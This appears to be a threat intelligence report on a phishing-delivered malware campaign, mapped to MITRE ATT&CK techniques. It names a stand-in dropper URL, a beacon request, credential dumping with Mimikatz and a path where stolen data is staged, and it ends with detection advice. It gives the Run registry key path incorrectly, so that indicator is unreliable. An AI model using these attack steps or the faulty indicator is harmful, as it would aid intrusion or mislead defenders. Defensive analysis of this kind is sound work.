Alex Morgan — Threat Intelligence Analyst
Key Takeaways
- The recent PHISHER malware campaign demonstrates advanced tactics for initial access through social engineering.
- Our analysis revealed the use of T1059.001 – Command and Scripting Interpreter: PowerShell for execution of the payload and persistence mechanisms.
- Threat actors employed T1071.001 – Application Layer Protocol: Web Protocols for command and control communications, leveraging HTTPS traffic.
Executive Summary
During our investigation of the PHISHER malware campaign, we identified a sophisticated approach that combines social engineering for initial access and several techniques from the MITRE ATT&CK framework to achieve its objectives. The malware primarily targets corporate environments, utilizing a blend of phishing emails and malicious attachments to install itself on victim machines. This analysis will detail the methodologies employed by the actor, from initial infection through to lateral movement and data exfiltration.
Initial Access
Initial access was often achieved through convincing phishing emails that exploited specific vulnerabilities in common office software. The actor leveraged email subjects that included enticing offers or critical updates, compelling users to open attachments and enable macros. We observed that the attachments typically contained Macro-Enabled Word Documents, which were meticulously designed to appear legitimate. Upon execution, the macros triggered a PowerShell command that downloaded the initial stage of the malware from a remote server. The URL used for the download, such as http://malicious-domain.com/dropper.ps1, employed domain generation algorithm (DGA) tactics to vary its resolve over time, making detection challenging.
Execution & Persistence
Once the dropper had been executed, it summoned the primary payload, which we identified as PHISHER. Upon execution, it created several artifacts within the system to ensure persistence. Specifically, we noted the registry modifications under HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Run, where the malware inserted a new value named PhisherService pointing to its executable, thus ensuring it would re-inject on every user login. During our analysis, we also discovered that the malware employed T1059.001 – Command and Scripting Interpreter: PowerShell as its primary execution method, allowing the actor to further obfuscate commands and scripts during execution.
Command and Control
Communication with the command and control (C2) infrastructure was predominantly achieved through T1071.001 – Application Layer Protocol: Web Protocols. We noted that the traffic was primarily HTTPS, providing an additional layer of concealment. The C2 server used a certificate that established a level of trustworthiness, further complicating detection. Regular beacons were observed every 30 minutes, with requests such as GET /query?token=xyz123, utilized to retrieve additional commands or exfiltrate stolen data. The actor also employed fast-flux techniques, ensuring that the IP addresses resolved continuously changed, which hampered established detection methodologies.
Lateral Movement & Discovery
Our investigation traced several lateral movement attempts utilizing T1021.001 – Remote Services: Remote Desktop Protocol. Here, PHISHER leveraged harvested credentials to access shared drives across the network. Through tools like Mimikatz, which were presumably deployed alongside the initial payload, the malware captured plaintext credentials from memory. A notable indicator of compromise (IOC) included a suspicious executable found in the %APPDATA%\Local\Temp directory, which had direct access to Active Directory, leading to privilege escalation attempts. The targeted machines indicated an escalation to domain admin accounts, heightening the severity of the incident.
Impact & Objectives
The objectives of the PHISHER campaign appeared twofold: data exfiltration and persistent network access. Our analysis revealed multiple instances of sensitive data being aggregated and prepared for exfiltration shortly after the malware’s installation, suggesting a clear intent to harvest proprietary information. Data governed by internal policies regarding user privacy and security was placed within compressed files at paths such as C:\Users\Public\Documents\stolen_data.zip for potential transfer. Additionally, the actor’s end goal seemed to be establishing footholds within multiple systems across the target’s infrastructure, allowing for repeat attacks.
MITRE ATT&CK Mapping
- T1071.001 – Application Layer Protocol: Web Protocols: Used for C2 communication.
- T1059.001 – Command and Scripting Interpreter: PowerShell: Execution of commands and payloads.
- T1021.001 – Remote Services: Remote Desktop Protocol: For lateral movement and accessing additional machines.
Detection Opportunities
- Monitor for suspicious PowerShell execution, especially involving encoded commands or downloads from known C2 infrastructure.
- Implement anomaly detection on outbound traffic for unusual HTTPS requests and DNS queries indicating fast-flux DNS behavior.
- Establish heuristics for abnormal registry modifications, particularly within the
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Runkey.
Analyst Notes
The PHISHER malware campaign illustrates the continuous evolution of threat actor tactics, emphasizing the importance of user awareness and robust network defenses. The ability to detect and respond effectively hinges on a multi-layered approach to monitoring user behavior and network traffic patterns. As threat landscapes continue to mature, understanding these TTPs will be pivotal in proactive defense strategies.
Source: Original Report